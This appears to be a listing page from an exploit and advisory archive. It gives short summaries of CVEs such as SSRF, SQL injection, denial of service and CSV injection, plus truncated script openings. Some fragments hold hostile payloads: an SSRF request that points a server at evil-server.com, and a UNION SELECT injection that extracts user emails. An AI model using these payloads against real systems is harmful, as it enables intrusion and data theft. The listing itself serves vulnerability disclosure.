Exploits & CVE's

Authored by Amirhossein Bahramizadeh HaoKeKeJi YiQiNiu versions up to 3.1 suffer from a server-side request forgery vulnerability. advisories | CVE-2024-0510 Change Mirror Download #!/bin/bash# Set target URL and payloadtarget_url="http://example.com/application/pay/controller/Api.php"payload="url=http://evil-server.com/exploit"# Send the malicious requestresponse=$(curl...

Authored by Amirhossein Bahramizadeh Taokeyun versions up to 1.0.5 suffers from a remote SQL injection vulnerability. advisories | CVE-2024-0480 Change Mirror Download #!/bin/bash# Variablesurl="http://example.com/path/to/taokeyun/application/index/controller/m/Drs.php"cid="1' UNION SELECT 1,2,3,4,5,6,7,8,9,email FROM users-- -"# Construct the requestrequest="POST...

Authored by Ivan Fratric, Google Security Research macOS suffers from an out-of-bounds write vulnerability in AppleVADriver when decoding mpeg2 videos. advisories | CVE-2023-42882

Authored by Fernando Mengali ProSSHD version 1.2 20090726 remote denial of service exploit. Change Mirror Download #!/usr/bin/perluse Net::SSH2# Exploit Title: ProSSHD 1.2 20090726 - Denial of Service (DoS)# Discovery by: Fernando Mengali#...

Authored by Jann Horn, Google Security Research Linux versions 4.20 and above have an issue where ktls writes into spliced readonly pages. advisories | CVE-2022-0847

Authored by Ivan Fratric, Google Security Research On Intel macOS, HEVC video decoding is performed in the AppleGVA module. Using fuzzing, researchers identified multiple issues in this decoder. The issues...

Authored by Rahad Chowdhury, BugsBD Limited PHPJabbers Meeting Room Booking System version 1.0 suffers from a CSV injection vulnerability. advisories | CVE-2023-51336 Change Mirror Download # Exploit Title: PHPJabbers Meeting Room Booking System...

Authored by Rahad Chowdhury, BugsBD Limited PHPJabbers Event Ticketing System version 1.0 suffers from a missing rate limiting vulnerability. advisories | CVE-2023-51339 Change Mirror Download # Exploit Title: PHPJabbers Event Ticketing System v1.0...

Authored by Fernando Mengali SimpleWebServer version 2.2-rc2 remote denial of service exploit. Change Mirror Download #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: PSimpleWebServer 2.2-rc2 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date:...

Authored by Ulyses Saicha, Sean Murphy | Site wordfence.com WordPress POST SMTP Mailer plugin versions 2.8.7 and below suffer from authorization bypass and cross site scripting vulnerabilities. advisories | CVE-2023-6875, CVE-2023-7027 Change...